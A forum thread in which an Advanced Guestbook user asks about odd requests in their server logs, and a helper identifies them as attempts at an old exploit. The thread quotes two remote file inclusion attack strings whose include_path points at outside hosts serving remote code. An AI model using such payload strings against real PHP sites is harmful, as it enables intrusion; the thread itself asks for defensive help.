If you are not registered or logged in, you may still use these forums but with limited features. Show recent topics
  [Search] Search   [Hottest Topics] Hottest Topics   [Members]  Member Listing   [FAQ]  FAQ 
[Register] Register / 
[Login] Login 
vulnerability  XML
Forum Index » Advanced Guestbook Forum
Author Message
gang-gang
Newbie

Joined: 16/09/2009 07:22:53
Messages: 2
Location: Australia
Offline

A while ago I downloaded Advance Guest Book 2.4.2 to my website. For some time now, AWSTATS has shown a lot of visits to the admin.php, index.php and image.php pages of the guestbook, mainly by robots. It also indicates a lot of referrals to my site from strange sites (usually on-line gaming or similar) which have no logical relationship with my site (genealogy and trekking). I checked out site visitors via CPANEL and found addresses of the type below
/xfile1/admin.php?include_path=http://randycute.com/zfxid1.txt??
/xfile1/admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt??

/xfile/admin.php is the admin page of Advanced Guestbook 2.4.2 on my site - the rest seems to be a redirect to a different site - which look a bit suspect to me. I certainly have not placed an such pathways.

Can you tell me what could be happening? Is there a vulnerability in Advanced Guestbook that is being exploited by dodgy sites? If there is a problem, has it been resolved in a leter version of Advanced Guestbook?

Thanks for any help.
aim icon
Carbonize
Master
[Avatar]

Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
Offline

They are trying to use an exploit that existed a few years ago.

Carbonize
I am not the maker of the Advanced Guestbook

get Lazarus
[Email] [WWW] [Yahoo!] aim icon [MSN] [ICQ]
gang-gang
Newbie

Joined: 16/09/2009 07:22:53
Messages: 2
Location: Australia
Offline

Thanks Carbonize,

I guess that I should upgrade to 2.4.4 or Lazarus to make the site a bit more secure.
aim icon
 
Forum Index » Advanced Guestbook Forum
Go to:   
Based on the open source JForum